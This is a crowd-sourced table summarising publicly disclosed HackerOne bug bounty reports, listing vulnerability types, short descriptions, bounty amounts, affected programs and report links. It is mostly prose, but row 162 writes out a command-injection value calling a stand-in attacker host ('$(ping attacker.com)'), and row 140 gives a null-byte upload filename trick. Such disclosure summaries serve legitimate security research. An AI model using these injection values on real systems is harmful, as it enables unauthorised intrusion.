Bug Bounty Reports


Summary of almost all paid bounty reports on H1

Public Bug Bounty Reports. Open for contributions from others as well, so please send a pull request if you can!

| # | Vulnerability type | Description | Bounty | Program | Report |
|---|---|---|---|---|---|
| 1 | IDOR | IDOR for order delivery address | $3000 | Mail.ru | https://hackerone.com/reports/723461 |
| 2 | IDOR | IDOR to change API-key description | $250 | Visma | https://hackerone.com/reports/809967 |
| 3 | SSRF | STUN SSRF | $3500 | Slack | https://hackerone.com/reports/333419 |
| 4 | SQLi | Blind SQLi through GET | $5000 | Mail.ru | https://hackerone.com/reports/786044 |
| 5 | SQLi | Blind SQLi through GET | $5000 | Mail.ru | https://hackerone.com/reports/795291 |
| 6 | SQLi | Blind SQLi through GET | $3000 | Mail.ru | https://hackerone.com/reports/732430 |
| 8 | SQLi | Blind Boolean-based SQLi through GET | $300 | Mail.ru | https://hackerone.com/reports/398131 |
| 9 | Buffer Overflow | Buffer Overflow | $1750 | Valve | https://hackerone.com/reports/458929 |
| 10 | Buffer Overflow | Buffer Overflow | $10,000 | Valve | https://hackerone.com/reports/542180 |
| 11 | CSRF | CSRF in iOS app | $2940 | Twitter | https://hackerone.com/reports/805073 |
| 12 | Open redirect | Phishing Open Redirect | $560 | Twitter | https://hackerone.com/reports/781673 |
| 15 | Information leak | Private key disclosed | $2000 | Slack | https://hackerone.com/reports/531032 |
| 16 | Request Smuggling | Request Smuggling | $6500 | Slack | https://hackerone.com/reports/737140 |
| 17 | Account Takeover | Brute force account takeover via recovery code | $3000 | Mail.ru | https://hackerone.com/reports/730067 |
| 18 | Information leak | Arbitrary memory leak through API call | $10,000 | Mail.ru | https://hackerone.com/reports/513236 |
| 19 | XSS | Blind Stored XSS | $600 | Mail.ru | https://hackerone.com/reports/659760 |
| 20 | LFI (Information leak) | Local File Inclusion | $4000 | Starbucks | https://hackerone.com/reports/780021 |
| 21 | LFI | Arbitrary file inclusion & execution | $1000 | Valve | https://hackerone.com/reports/508894 |
| 22 | Information leak | Low impact information leak | $500 | HackerOne | https://hackerone.com/reports/826176 |
| 23 | Insufficient security controls | CORS misconfiguration | $1000 | SEMrush | https://hackerone.com/reports/235200 |
| 24 | Logic bug | Domain authority regex logic bug | $6000 | Google | https://bugs.xdavidhu.me/google/2020/03/08/the-unexpected-google-wide-domain-check-bypass/ |
| 25 | Privilege escalation | Abusing backup and restore function to escalate privileges | $1500 | Ubiquiti Inc | https://hackerone.com/reports/329659 |
| 26 | Privilege escalation | Arbitrary file deletion + DLL hijacking leads to privilege escalation during install | $667 | Ubiquiti Inc | https://hackerone.com/reports/530967 |
| 27 | Information leak | Unauthenticated API endpoint leaking holiday schedule of employees in China | $4000 | Starbucks | https://hackerone.com/reports/659248 |
| 28 | Account takeover | Changing URL path from login to new-password allows merging the victim's store into the attacker's account | $7500 | Shopify | https://hackerone.com/reports/796956 |
| 29 | Improper access control | Unauthenticated API allows enumeration of user names & phone numbers | $500 | Razer | https://hackerone.com/reports/752443 |
| 30 | Authentication bypass | Auth bypass allowing access to support tickets | $1500 | Razer | https://hackerone.com/reports/776110 |
| 31 | Privilege escalation | Same as below, but the change of email HAS to be completed before receiving the email verification request. Rewarded due to different root cause | $15,000 | Shopify | https://hackerone.com/reports/796808 |
| 32 | Privilege escalation | Take over any Shopify store by registering an email, sending an email verification request, changing the email and confirming the request (chain) | $15,000 | Shopify | https://hackerone.com/reports/791775 |
| 33 | Command injection | Abusing relative paths to run custom scripts during startup | $750 | Slack | https://hackerone.com/reports/784714 |
| 34 | Authentication bypass | View webcam and run code in context of any webpage in Safari | $75,000 | Apple | https://www.ryanpickren.com/webcam-hacking-overview |
| 35 | XSS | Stored XSS through chat message | $300 | Vanilla | https://hackerone.com/reports/683792 |
| 36 | IDOR | IDOR allows enumeration of users with connected Google Analytics or the number of calendars owned by a single user | $500 | SEMrush | https://hackerone.com/reports/797685 |
| 37 | Logic Error | Negative values allowed for price parameters, allowing for free goods | $2111 | SEMrush | https://hackerone.com/reports/771694 |
| 38 | XSS | Stored XSS in customer chat | $1000 | Shopify | https://hackerone.com/reports/798599 |
| 39 | XSS | XSS through FB Group integration | $500 | Shopify | https://hackerone.com/reports/267570 |
| 40 | SQLi | Error-based SQLi through GET | $1500 | Mail.ru | https://hackerone.com/reports/790005 |
| 41 | SSRF | Blind SSRF | $150 | Mail.ru | https://hackerone.com/reports/120298 |
| 42 | IDOR | Leaking order information due to IDOR (no PII, only bought items) | $150 | Mail.ru | https://hackerone.com/reports/791289 |
| 43 | Code injection | PHP injection through unserialize() leading to code execution | $3000 | Mail.ru | https://hackerone.com/reports/798135 |
| 44 | Subdomain Takeover | Dangling AWS record allowed zone transfer, leading to access to cookies and CORS, which could facilitate phishing attacks | $500 | Uber | https://hackerone.com/reports/707748 |
| 45 | Logic Error | No validation that the user rated their own trips, meaning drivers could alter their ratings. | $1500 | Uber | https://hackerone.com/reports/724522 |
| 46 | LFI | Using the PDF generator and an iframe, one could export the PDF with arbitrary file content | $500 | Visma | https://hackerone.com/reports/809819 |
| 47 | XSS | DOM XSS in IE & Edge on main page | $1000 | ForeScout Technologies | https://hackerone.com/reports/704266 |
| 48 | Logic Error | Overwrite data as low-privilege user by renaming an existing folder to the name of a folder you do not have access to | $250 | NextCloud | https://hackerone.com/reports/642515 |
| 49 | Improper access control | Unauthenticated API allowed an attacker to change the hostname of a device | $550 | UniFi Cloud | https://hackerone.com/reports/802079 |
| 50 | SQLi | SQLi through multiple parameters, but in an unused service. Data exfiltration possible. | $2000 | Razer | https://hackerone.com/reports/777698 |
| 51 | SQLi | SQLi through GET parameter allowed for data exfiltration from Thai users. | $2000 | Razer | https://hackerone.com/reports/768195 |
| 52 | SQLi | SQLi allowing for access to data on Thai server. | $2000 | Razer | https://hackerone.com/reports/781205 |
| 53 | SSRF | SSRF that could have led to compromise of the server and a significant data breach | $2000 | Razer | https://hackerone.com/reports/777664 |
| 54 | Information leak | PHP file with source code exposed. No exploit. | $200 | Razer | https://hackerone.com/reports/819735 |
| 55 | CSRF | CSRF token with 24h lifetime, leading to the possibility of connecting the attacker's PayPal with the victim's Shopify account | $500 | Shopify | https://hackerone.com/reports/807924 |
| 56 | Code Injection | macOS client is vulnerable to a low-privilege attacker injecting code into the application using a dylib. This is due to the Hardened Runtime capability not being set in Xcode | $250 | NextCloud | https://hackerone.com/reports/633266 |
| 57 | Information leak | Cleartext storage of API keys & tokens. Very poorly handled. | $750 | Zenly | https://hackerone.com/reports/753868 |
| 58 | Improper access control | AWS bucket access key transmitted in cleartext | $300 | BCM Messenger | https://hackerone.com/reports/764243 |
| 59 | Improper access control | Able to add paid function for 14 days for free | $200 | Coda | https://hackerone.com/reports/777942 |
| 60 | XSS | Blind XSS in admin panel through a partner's superuser name | $750 | Mail.ru | https://hackerone.com/reports/746497 |
| 61 | XSS | Blind XSS in admin panel through a partner's superuser name (same issue, different endpoint) | $750 | Mail.ru | https://hackerone.com/reports/746505 |
| 62 | SSRF | SSRF & Local File Read via photo upload | $6000 | Mail.ru | https://hackerone.com/reports/748128 |
| 63 | SSRF | SSRF & Local File Read via photo retrieving functionality | $6000 | Mail.ru | https://hackerone.com/reports/748069 |
| 64 | SSRF | SSRF & Local File Read via photo editor | $6000 | Mail.ru | https://hackerone.com/reports/748123 |
| 65 | Logic Error | A partner account with manager role could withdraw money from a driver's account | $8000 | Mail.ru | https://hackerone.com/reports/751347 |
| 66 | XSS | Reflected XSS through XML Namespace URI | $500 | Mapbox | https://hackerone.com/reports/780277 |
| 67 | Code Injection | HTML Injection for IE only | $500 | Mail.ru | https://hackerone.com/reports/757100 |
| 68 | DoS | Cache poisoning of the CORS Access-Control-Allow-Origin header | $550 | Automattic | https://hackerone.com/reports/591302 |
| 69 | IDOR | Remote wipe of other users' devices | $500 | Nextcloud | https://hackerone.com/reports/819807 |
| 70 | SSRF | GitLab local instance SSRF bypass through DNS rebinding in webhooks | $3500 | GitLab | https://hackerone.com/reports/632101 |
| 71 | LFI | openStream called on java.net.URL allows access to local resources when passing in file:// or jar:// | $1800 | GitHub Security Lab | https://hackerone.com/reports/844327 |
| 72 | Logic Bug | Not checking if Linux privileges are successfully dropped leads to increased attack surface | $1800 | GitHub Security Lab | https://hackerone.com/reports/845729 |
| 73 | SQLi | Arbitrary SQL queries via DocID parameter of WebSocket API | $1800 | GitHub Security Lab | https://hackerone.com/reports/854439 |
| 74 | Logic Bug | Account takeover through link injection in contact form | $1000 | Insolar | https://hackerone.com/reports/786741 |
| 75 | Information leak | Ability to see other shops' product titles, only if they are using a particular app and have an attachment | $500 | Shopify | https://hackerone.com/reports/848625 |
| 76 | XSS | Reflected XSS on API server (no regular users browsing the page) | $250 | Razer | https://hackerone.com/reports/791941 |
| 77 | Brute Force | Counter-specific (?) password was not protected against brute force attacks | $150 | Mail.ru | https://hackerone.com/reports/754536 |
| 78 | Authentication bypass | Knowing the victim's phone number allowed access to partial information about the victim's travel: payment type, profile information, etc. | $8000 | Mail.ru | https://hackerone.com/reports/772118 |
| 79 | Information leak | API endpoint disclosed e-mails of subscribed users | $250 | Mail.ru | https://hackerone.com/reports/703086 |
| 80 | DoS | DoS & unsafe object creation through JSON parsing | $500 | Ruby | https://hackerone.com/reports/706934 |
| 81 | Logic Error | Session expiration is not enforced during signup. Bypass can be done by deleting the HTML element blocking progress | $100 | Visma | https://hackerone.com/reports/810400 |
| 82 | Subdomain Takeover | Subdomain takeover due to expired / unclaimed HubSpot instance | $2500 | Roblox | https://hackerone.com/reports/335330 |
| 83 | Information leak | Endpoint vulnerable to Heartbleed | $1500 | Uber | https://hackerone.com/reports/304190 |
| 84 | RCE | LFI through path traversal in image tag in Markdown. Disclosure of local files leads to disclosure of a secret, which can be used to achieve RCE through deserialization | $20,000 | GitLab | https://hackerone.com/reports/827052 |
| 85 | Prototype Pollution | Simple prototype pollution due to improper handling of zipObjectDeep | $250 | Node.js Third Party Modules (lodash) | https://hackerone.com/reports/712065 |
| 86 | Information disclosure | Session is not properly invalidated after logging out. When creating a store before upgrading your account, visitors are required to enter a password. This password is disclosed after logging out, when visiting a certain link. | $500 | Shopify | https://hackerone.com/reports/837729 |
| 87 | IDOR | Able to bypass ban restrictions through path normalization. APIs are also unrestricted | $800 | Roblox | https://hackerone.com/reports/703058 |
| 88 | Phishing | Link URL falsification by altering post message | $250 | Slack | https://hackerone.com/reports/481472 |
| 89 | Information leak | Leaking (unrestricted?) Google API key | $150 | Identify | https://hackerone.com/reports/724039 |
| 90 | Improper access control | Read-only team members can read all properties of webhooks through GraphQL | $0 | HackerOne | https://hackerone.com/reports/818848 |
| 91 | DoS | DoS through sending a large message to the server | $500 | Roblox | https://hackerone.com/reports/679907 |
| 92 | IDOR | Access to log files via IDOR through exposed signature in Razer Pay Android app | $500 | Razer | https://hackerone.com/reports/754044 |
| 93 | Path Traversal | Misconfiguration when handling URI paths allowed for docroot path traversal, giving access to non-sensitive data usually not accessible to users | $500 | Starbucks | https://hackerone.com/reports/844067 |
| 94 | Improper Certificate Validation | Client-side traffic hijacking allowed for user data interception (local?) | $750 | Razer | https://hackerone.com/reports/795272 |
| 95 | Improper authorization | The Razer Pay backend server could be exploited to obtain transaction details from another user | $500 | Razer | https://hackerone.com/reports/754339 |
| 96 | SQLi | Razer Pay API was vulnerable to SQLi exposing user information | $2000 | Razer | https://hackerone.com/reports/811111 |
| 97 | Improper authorization | Reverse engineering the Android app allowed for bypassing the signatures in place to prevent parameter tampering, revealing a variety of IDOR issues | $1000 | Razer | https://hackerone.com/reports/753280 |
| 98 | HTTP Response Splitting | Limited CRLF injection allowed for manipulation of cookies | $150 | Mail.ru | https://hackerone.com/reports/838682 |
| 99 | IDOR | Issue with the marketplace due to length restriction in choosing hashing function | $5000 | SEMrush | https://hackerone.com/reports/837400 |
| 100 | SSRF | SSRF & LFI in Site Audit due to lack of connection protocol verification | $2000 | SEMrush | https://hackerone.com/reports/794099 |
| 101 | SSL Downgrade | Possible to temporarily downgrade a victim from HTTPS to HTTP in Firefox. Required the victim clicking a link and had a very short timeframe to be successful | $500 | Uber | https://hackerone.com/reports/221955 |
| 102 | XSS | Reflected XSS due to outdated WordPress installation led to exposure of sensitive form data and user data | $4000 | Uber | https://hackerone.com/reports/340431 |
| 103 | Open Redirect | Open redirect in GET parameter | $50 | Unikrn | https://hackerone.com/reports/625546 |
| 104 | DoS | Bypassing character limitation on 'Moments' feature and creating many of them leads to DoS | $560 | Twitter | https://hackerone.com/reports/819088 |
| 105 | CRLF Injection | CRLF injection in urllib | $1000 | Python (IBB) | https://hackerone.com/reports/590020 |
| 106 | Subdomain Takeover | Out of scope, no-impact subdomain takeover of UptimeRobot page | $100 | BTFS | https://hackerone.com/reports/824909 |
| 107 | SQLi | Blind Boolean-based SQLi in Razer Gold TH | $1000 | Razer | https://hackerone.com/reports/790914 |
| 108 | SSRF | SSRF allowing port scanning of localhost through Host header injection | $300 | TTS Bug Bounty | https://hackerone.com/reports/272095 |
| 109 | Cryptographic Issues | A variety of WPA3 issues related to cryptography and logic | $750 | The Internet | https://hackerone.com/reports/745276 |
| 110 | XSS | Reflected XSS on resources.hackerone.com | $500 | HackerOne | https://hackerone.com/reports/840759 |
| 111 | Information leak | Un-minified JS code disclosed on some pages | $250 | Imgur | https://hackerone.com/reports/845677 |
| 112 | XSS | Self-XSS to normal XSS by bypassing X-Frame-Options to automatically execute JS through loading content in iframes | $250 | Pornhub.com | https://hackerone.com/reports/761904 |
| 113 | IDOR | A partner account could access another partner's driver data through an IDOR | $1500 | mail.ru | https://hackerone.com/reports/747612 |
| 114 | IDOR | A partner account could access information about other partners through an IDOR | $1500 | mail.ru | https://hackerone.com/reports/746513 |
| 115 | IDOR | A partner with manager role could take over a driver's account belonging to a different partner | $8000 | mail.ru | https://hackerone.com/reports/751281 |
| 116 | XSS | Stored XSS in messages to drivers through the operator interface | $500 | mail.ru | https://hackerone.com/reports/751263 |
| 117 | Code Execution | PHP code execution through image upload functionality | $3000 | mail.ru | https://hackerone.com/reports/854032 |
| 118 | Improper Access Control | Delete projects from archived companies set to read-only. | $100 | Visma | https://hackerone.com/reports/849157 |
| 119 | Information leak | Account takeover due to leaking auth URLs on Google & leaking OTP in API response | $500 | Badoo | https://hackerone.com/reports/746186 |
| 120 | XSS | Stored XSS through file upload (.pdf → JS) | $250 | Visma | https://hackerone.com/reports/808862 |
| 121 | Information leak | 404 page leaks all headers | $500 | HackerOne | https://hackerone.com/reports/792998 |
| 122 | CSRF | "Friends Only" account mode could be toggled through CSRF | $250 | Mail.ru | https://hackerone.com/reports/448928 |
| 123 | Subdomain Takeover | Possible due to wildcard pointing to Uberflip domain | $500 | HackerOne | https://hackerone.com/reports/863551 |
| 124 | DoS | Improper error handling leads to DoS and service failure when supplying an invalid "Redirect_URI" parameter | $1000 | GitLab | https://hackerone.com/reports/702987 |
| 125 | Information leak | Private program invites can disclose the email of any user invited by username | $7500 | HackerOne | https://hackerone.com/reports/807448 |
| 126 | SSRF | SSRF through notification configuration. Requires admin privileges | $300 | Phabricator | https://hackerone.com/reports/850114 |
| 127 | Improper Access Control | Read-only user without access to payroll can still access the data by visiting the URL directly | $250 | Visma | https://hackerone.com/reports/838563 |
| 128 | XSS | Code does not sufficiently escape template expressions, allowing for XSS | $500 | Ruby On Rails | https://hackerone.com/reports/474262 |
| 129 | Information leak | Potentially sensitive information leaked through debug interface | $150 | Mail.ru | https://hackerone.com/reports/748925 |
| 130 | Misconfiguration | Network restrictions on admin interface could be bypassed using alternate hostnames | $150 | Mail.ru | https://hackerone.com/reports/749677 |
| 131 | Request Smuggling | Request smuggling poisoning users via Host header injection | $750 | TTS | https://hackerone.com/reports/726773 |
| 132 | Lack of security mechanisms | Lack of user warning when opening potentially dangerous files from the chat window | $250 | Mail.ru | https://hackerone.com/reports/633600 |
| 133 | XSS | Reflected XSS in investor relations website due to unsanitized user input | $350 | Razer | https://hackerone.com/reports/801075 |
| 134 | SQLi | Blind SQLi due to no input sanitization in the "Top Up" function of the Razer Gold TH service | $1000 | Razer | https://hackerone.com/reports/789259 |
| 135 | Subdomain Takeover | Subdomain takeover | $250 | Razer | https://hackerone.com/reports/810807 |
| 136 | Open redirect | Open redirect in login flow | $150 | TTS | https://hackerone.com/reports/798742 |
| 137 | Race Condition | Race condition in email verification that awards in-game currency, leading to similar impact as a payment bypass | $2000 | InnoGames | https://hackerone.com/reports/509629 |
| 138 | Account Takeover | Links on in-game forum leak the Referer header, which contains the CSRF token. The page also embeds links with the cookie value on the page. Utilizing self-XSS combined with the CSRF token, you can grab the cookie from the DOM and send it to the attacker, resulting in account takeover | $1100 | InnoGames | https://hackerone.com/reports/604120 |
| 139 | XSS | Reflected XSS due to insufficient input sanitization. Could allow for account takeover or user session manipulation. | $1900 | PayPal | https://hackerone.com/reports/753835 |
| 140 | XSS | Stored XSS through bypass of file type upload restriction by null byte. Uploading xx.html%00.pdf containing JS works like a stored XSS when accessed | $250 | Visma | https://hackerone.com/reports/808821 |
| 141 | Improper Authentication | An issue in how Cloudflare's authoritative DNS server processes requests with ":" in them. This allows an attacker to spoof NXDOMAINs within safe zones. | $400 | Open-Xchange | https://hackerone.com/reports/858854 |
| 142 | Improper Access Control | Can reply to or delete replies from any user in any public group, without joining said group. (BuddyPress) | $225 | WordPress | https://hackerone.com/reports/837256 |
| 143 | Privilege Escalation | Author role has access to edit, trash and add new items within BuddyPress Emails. | $225 | WordPress | https://hackerone.com/reports/833782 |
| 144 | CSRF | Profile field CSRF allows for deleting any field in BuddyPress | $225 | WordPress | https://hackerone.com/reports/836187 |
| 145 | Privilege Escalation | IDOR + changing parameter from "Moderator" to "Admin" leads to privilege escalation | $225 | WordPress | https://hackerone.com/reports/837018 |
| 146 | Privilege Escalation | Chaining 5 vulnerabilities leads to privilege escalation to root: symlink attack combined with race condition leads to executing malicious code | $500 | NordVPN | https://hackerone.com/reports/767647 |
| 147 | XSS | Reflected XSS evading WAF + confirming insufficient fix | $1000 | Glassdoor | https://hackerone.com/reports/846338 |
| 148 | Information leak | New retest functionality discloses existence of private programs through having the tag added to the program description | $500 | HackerOne | https://hackerone.com/reports/871142 |
| 149 | XSS | Outdated PDF.js allows for XSS using CVE-2018-5158 | $100 | Nextcloud | https://hackerone.com/reports/819863 |
| 150 | DoS | DoS due to having a large number of groups and sending a tampered request (changed Accept-Encoding & User-Agent) | $500 | HackerOne | https://hackerone.com/reports/861170 |
| 151 | XSS | Stored XSS in user profile | $200 | QIWI | https://hackerone.com/reports/365093 |
| 152 | Logic Bug | Service time expiry validation bypass leads to unlimited use due to bypassing licensing time checks | $400 | NordVPN | https://hackerone.com/reports/865828 |
| 153 | Improper Access Control | Privilege escalation through improper access control on /membership/ endpoint | $500 | Helium | https://hackerone.com/reports/809816 |
| 154 | IDOR | Sending invitations is vulnerable to IDOR, resulting in being able to invite any account as administrator of an organization by knowing the organization's UUID | $100 | Helium | https://hackerone.com/reports/835005 |
| 155 | Improper Access Control | Docker Registry API v2 exposed through HTTP, allowing for dumping & poisoning of Docker images. | $2000 | Semmle | https://hackerone.com/reports/347296 |
| 156 | Code Injection | CodeQL query to detect JNDI injections | $2300 | GitHub | https://hackerone.com/reports/892465 |
| 157 | Information leak | GraphQL query can disclose information about undisclosed reports to the HackerOne program due to the retest feature | $2500 | HackerOne | https://hackerone.com/reports/871749 |
| 158 | Logic Bug | CodeQL query to detect improper URL handling | $1800 | GitHub | https://hackerone.com/reports/891268 |
| 159 | Information leak | CodeQL query to detect Spring Boot actuator endpoints | $1800 | GitHub | https://hackerone.com/reports/891266 |
| 160 | Logic Bug | CodeQL query to detect incorrect conversion between numeric types in Go | $1800 | GitHub | https://hackerone.com/reports/891265 |
| 161 | Improper Access Control | Certain API methods were not properly restricted and leaked statistics about arbitrary domains | $400 | Mail.ru | https://hackerone.com/reports/831663 |
| 162 | Code Injection | Chat commands like "/calculate 1+1" are supported, but the function can be abused by using Bash syntax to execute commands, e.g. "/calculate $(ping attacker.com)", leading to arbitrary code execution | $3000 | Nextcloud | https://hackerone.com/reports/851807 |
| 163 | Privilege Escalation | Can invite members to a "clan" even when the user does not have access to that function | $550 | InnoGames | https://hackerone.com/reports/511275 |
| 164 | XSS | AirMax software was vulnerable to Reflected XSS on multiple endpoints and parameters | $150 | Ubiquiti inc. | https://hackerone.com/reports/386570 |
| 165 | Privilege Escalation | Changing email parameter allows privilege escalation to admin | $100 | Helium | https://hackerone.com/reports/813159 |
| 166 | Information leak | CodeQL query to detect logging of sensitive data | $500 | GitHub | https://hackerone.com/reports/886287 |
| 167 | CSRF | CSRF is possible in the AirMax software on multiple endpoints, leading to possible firmware downgrade, config modification, file or token exfiltration, etc. | $1100 | Ubiquiti inc. | https://hackerone.com/reports/323852 |
| 168 | Account Takeover | No brute-force protection on SMS verification endpoint led to account takeover | $1700 | Mail.ru | https://hackerone.com/reports/744662 |
| 169 | IDOR | API allowed for leaking information on job seekers / employers through IDOR | $500 | Mail.ru | https://hackerone.com/reports/743687 |
| 170 | XSS | Reflected XSS through URI on 404 page | $300 | Mail.ru | https://hackerone.com/reports/797717 |
| 171 | SSRF | SSRF through using functionality from an included library that should be disabled | $10,000 | GitLab | https://hackerone.com/reports/826361 |
| 172 | Information leak | Insufficient verification leads to ability to read sensitive files | $10,000 | GitLab | https://hackerone.com/reports/850447 |
| 173 | Improper Authentication | Could impersonate and answer tickets belonging to other users | $550 | InnoGames | https://hackerone.com/reports/876573 |
| 174 | Subdomain Takeover | Subdomain takeover of iosota.razersynapse.com | $200 | Razer | https://hackerone.com/reports/813313 |
| 175 | XSS | Reflected XSS through cookies on FTP server for Thai employees | $375 | Razer | https://hackerone.com/reports/748217 |
| 176 | XSS | Out-of-scope DOM XSS leading to impact on account security for an in-scope asset. Only applicable to IE and Edge. | $750 | Rockstar Games | https://hackerone.com/reports/663312 |
| 177 | SQLi | Search function was crashable, disclosing error logs with useful information for other potential attacks. | $250 | Rockstar Games | https://hackerone.com/reports/808832 |
| 178 | Open Redirect | Could potentially leak sensitive tokens through the Referer header on GTA Online sub-site. | $750 | Rockstar Games | https://hackerone.com/reports/798121 |
| 179 | XSS | DOM XSS in GTA Online feedback endpoint. Other issues with the same root cause were also found on the same site. | $1250 | Rockstar Games | https://hackerone.com/reports/803934 |
| 180 | DoS | In email verification emails, the unique number is assigned sequentially, meaning you can invalidate all future registrations by visiting the following URL. Ex: confirmmail/1/jfaiu -> confirmmail/2/jfaiu | $150 | Vanilla | https://hackerone.com/reports/329209 |
| 181 | Information leak | External images could be referenced in the screenshot utility feature, possibly leading to Facebook OAuth token theft | $500 | Rockstar Games | https://hackerone.com/reports/497655 |
| 182 | XSS | DOM XSS on main page achieved through multiple minor issues, like path traversal and open redirect | $850 | Rockstar Games | https://hackerone.com/reports/475442 |
| 183 | XSS | Stored XSS through demo function in multiple parameters using the javascript: scheme | $750 | Shopify | https://hackerone.com/reports/439912 |
| 184 | Improper access control | After removing admin access from an account, it can still make changes with admin permissions until logged out. The account can also still make changes to embedded apps, but this is by design. | $1000 | Shopify | https://hackerone.com/reports/273099 |
| 185 | CSRF | Account takeover on Social Club by using CSRF to link an account to the attacker's Facebook account, leading to the ability to log in as the victim | $1000 | Rockstar Games | https://hackerone.com/reports/474833 |
| 186 | XSS | Reflected XSS due to decoding and executing code after the last "/" on GTAOnline/jp. | $750 | Rockstar Games | https://hackerone.com/reports/507494 |
| 187 | Open Redirect | Open Redirect on the support page, impacting the mobile page | $750 | Rockstar Games | https://hackerone.com/reports/781718 |
| 188 | XSS | DOM XSS on GTAOnline. Regressed directory traversal and new XSS issue | $750 | Rockstar Games | https://hackerone.com/reports/479612 |
| 189 | Race Condition (TOCTOU) | Can click the "This Rocks" (like) button any number of times, allowing an attacker to fill up the victim's notification feed | $250 | Rockstar Games | https://hackerone.com/reports/474021 |
| 190 | XSS | DOM XSS in the video section of the GTAOnline page through the returnurl parameter, only exploitable on non-English versions. | $750 | Rockstar Games | https://hackerone.com/reports/505157 |
| 191 | CSRF | CSRF on login page only, due to processing credentials before checking for CSRF protections. This is also only valid when forcing non-4xx responses from the server | $500 | HackerOne | https://hackerone.com/reports/834366 |
| 192 | RCE | RCE through Blind SQLi in WHERE clause | $5500 | QIWI | https://hackerone.com/reports/816254 |
| 193 | RCE | RCE through Blind SQLi in WHERE clause | $1000 | QIWI | https://hackerone.com/reports/816560 |
| 194 | RCE | RCE through Blind SQLi in prepared statement | $1000 | QIWI | https://hackerone.com/reports/816086 |
| 195 | IDOR | Read-only user can change name of device in admin account | $50 | Helium | https://hackerone.com/reports/865115 |
| 196 | Path Traversal | Access to restricted data through path traversal (requires valid authentication cookie) | $4000 | Starbucks | https://hackerone.com/reports/876295 |
| 197 | XSS | Combining two minor harmless injections results in DOM-based Reflected XSS | $250 | Starbucks | https://hackerone.com/reports/396493 |
| 198 | XSS | Bypass of previous issue by encoding " as %2522 | $250 | Starbucks | https://hackerone.com/reports/252908 |
| 199 | SQLi | Blind, time-based SQLi due to unsafe handling of GET parameter | $15,000 | Mail.ru | https://hackerone.com/reports/868436 |
| 200 | SSRF | By being able to redirect key lookups (since they are on your own domain and the lookup is done over DNS), you can trick the sending server into accessing arbitrary addresses. | $400 | Open-Xchange | https://hackerone.com/reports/792960 |
| 201 | SSRF | Same as 200 but through different code. Being able to control DNS records for your own domain, you can redirect servers accessing your domain to get your public key into returning data from an internal asset. | $400 | Open-Xchange | https://hackerone.com/reports/792953 |
| 202 | XSS | DOM XSS through XSS payload in UID field of a key. Exploited by sending the key to the victim, who then imports it. | $500 | Open-Xchange | https://hackerone.com/reports/788691 |
| 203 | Information disclosure | Attacker can leak OAuth token due to redirect_uri not properly detecting IDN homograph attacks (Unicode character confusion attack: é = e) | $1000 | SEMrush | https://hackerone.com/reports/861940 |
| 204 | DoS | DoS through no length restriction on the "instruction" field when creating a new program. | $2500 | HackerOne | https://hackerone.com/reports/887321 |
| 205 | CSRF | CSRF token is not checked | $250 | Visma | https://hackerone.com/reports/878443 |
| 206 | Path Traversal | By executing a path traversal attack on the frontend, arbitrary API calls on the (internal only) backend were possible. This led to being able to enumerate 100 million real users. | $4000 | Starbucks | https://samcurry.net/hacking-starbucks/ |
| 207 | Privacy Violation | Incorrect usage of Google Ad ID integration led to a privacy issue | $200 | NordVPN | https://hackerone.com/reports/803941 |
| 208 | Insecure design principles | Including vendor-based eval-stdin.php leads to potential RCE | $100 | NextCloud | https://hackerone.com/reports/820146 |
| 209 | CSRF | Lack of CSRF protection when linking Facebook account with Social Club account led to potential takeover. Required preconditions and deception to succeed. | $550 | Rockstar Games | https://hackerone.com/reports/653254 |
| 210 | Information Disclosure | A chain of vulnerabilities leads to being able to possibly exfiltrate user tokens. One part was image injection in the Screenshot-View function. | $500 | Rockstar Games | https://hackerone.com/reports/655288 |
| 211 | Information Disclosure | Image injection in www.rockstargames.com/bully/screens could be combined with other minor issues to leak user tokens. | $500 | Rockstar Games | https://hackerone.com/reports/661646 |
| 212 | XSS | DOM XSS in localized (different languages) Red Dead Redemption 2 video viewer: www.rockstargames.com/reddeadredemption2/br/videos | $750 | Rockstar Games | https://hackerone.com/reports/488108 |
| 213 | CSRF | CSRF issue in language changing function for GTA Online could be chained with other vulnerabilities to leak user tokens. | $500 | Rockstar Games | https://hackerone.com/reports/809691 |
| 214 | Information Disclosure | Image injection on www.rockstargames.com/bully/anniversaryedition. Could be combined with other issues to leak user tokens. | $500 | Rockstar Games | https://hackerone.com/reports/498358 |
| 215 | Information Disclosure | Image injection fix bypass in the screenshot-viewer utility | $500 | Rockstar Games | https://hackerone.com/reports/505259 |
| 216 | Information Disclosure | Another image injection fix bypass in the screenshot-viewer utility | $500 | Rockstar Games | https://hackerone.com/reports/506126 |
| 217 | XSS | Flash file based Open Redirect and XSS vulnerability. | $500 | Rockstar Games | https://hackerone.com/reports/485382 |
| 218 | Open Redirect | Open Redirect in language changing functionality on https://www.rockstargames.com/GTAOnline. This could be used to leak sensitive tokens from the URL through the Referer header. | $500 | Rockstar Games | https://hackerone.com/reports/870062 |
| 219 | XSS | Localized (different languages) versions of https://www.rockstargames.com/GTAOnline/ were vulnerable to DOM XSS in various locations. This combined with Open Redirect allowed for user token exfiltration. | $750 | Rockstar Games | https://hackerone.com/reports/508517 |
| 220 | Information Disclosure | Image injection on localized (different languages) versions of the games/info endpoint (https://www.rockstargames.com/br/#/games/info). This could lead to leaking user tokens through the Referer header. | $500 | Rockstar Games | https://hackerone.com/reports/510388 |
| 221 | Information Disclosure | Attack chain leading to leaking OAuth tokens. Image injection in https://www.rockstargames.com/bully/anniversaryedition combined with other minor issues allowed this attack to be successful. | $500 | Rockstar Games | https://hackerone.com/reports/659784 |
| 222 | XSS | DOM XSS in localized versions of the GTA Online screenshot site, like the following: https://www.rockstargames.com/GTAOnline/jp/screens/ | $750 | Rockstar Games | https://hackerone.com/reports/508475 |
| 223 | XSS | DOM XSS in www.rockstargames.com/GTAOnline/features/freemode | $750 | Rockstar Games | https://hackerone.com/reports/799739 |
| 224 | Improper Authentication | Host (origin) checking of the Digits SDK passes an attacker-controlled string to a function expecting a regex, so regex-specific characters in the domain name ("." matching any character) allow bypassing the check. The impact was account takeover. | $5040 | Twitter | https://hackerone.com/reports/129873 |
| 225 | CSRF | User token leak through the Referer header by abusing a vulnerable chain of issues. This was due to an insufficient referrer policy. The URL was extracted by abusing an Open Redirect issue. The vulnerable endpoint was socialclub.rockstargames.com/crew/ | $750 | Rockstar Games | https://hackerone.com/reports/787160 |
| 226 | CSRF | Leaking user tokens through the Referer header by exploiting a chain of issues. The part handled in this report is image injection leading to XSS on https://www.rockstargames.com/newswire/article | $750 | Rockstar Games | https://hackerone.com/reports/790465 |
